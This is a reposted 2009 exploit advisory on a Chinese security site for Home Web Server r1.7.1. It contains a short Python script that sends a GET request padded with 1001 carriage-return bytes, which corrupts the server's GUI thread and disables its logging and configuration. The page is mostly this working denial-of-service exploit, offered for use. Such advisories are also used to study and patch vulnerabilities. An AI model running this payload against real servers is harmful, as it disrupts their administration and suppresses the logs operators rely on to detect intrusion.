首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption
来源:f3arm3d3ar@gmail.com 作者:Aodrulez 发布时间:2009-04-24  

  Home Web Server <=r1.7.1 (build 147) "Gui Thread-Memory Corruption Exploit." By: Aodrulez.

Homepage         : http://downstairs.dnsalias.net/homewebserver.html
Product Released : 22.4.2009/21:16:58
 

Description:
 This web server when fed with
1006 bytes of chr(0x0d),with the html
"GET" parameter,the Server's Gui's
Thread gets corrupted.This means,
though the web server works normally,
(due to Multithreading),No more Logs
are generated.Also "all" the web server
configuration settings are unavailable.


 
Exploit (Python):
----------------------------------------------------------
# Echo client program
import socket

HOST = 'localhost'    # The remote host
pORT = 80           # The same port as used by the server
print '####################################'
print '#Home Web Server r1.7.1 (build 147)#'
print '#  Gui Thread Corruption Exploit   #'
print '#                                  #'
print '#          By: Aodrulez            #'
print '#       f3arm3d3ar@gmail.com       #'
print '#                                  #'
print '####################################'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, pORT))
p='GET '+chr(0x0d)*1001+'index.html HTTp/1.0\r\n\r\n'
s.send(p)
s.close()
print '\"'+HOST+'\'s Gui Got Corrupted :P\"     '
---------------------------------------------------------

Greetz Fly out to:
1] Amforked()      : My Mentor.
2] The Blue Genius : :-)
3] www.OrchidSeven.com


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Norton Ghost Support module fo
·Dream FTP Server 1.02 (users.d
·Zervit HTTP Server <= 0.3 (soc
·Popcorn 1.87 Remote Heap Overf
·CoolPlayer Portable 2.19.1 (m3
·CoolPlayer Portable 2.19.1 (Sk
·PJblog V3.0 0day+EXP
·Absolute Form Processor XE-V 1
·SDP Downloader v2.3.0 (.ASX Fi
·Microsoft Internet Infomation
·CoolPlayer Portable 2.19.1 (m3
·linux内核CAP_KILL校验本地提权
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved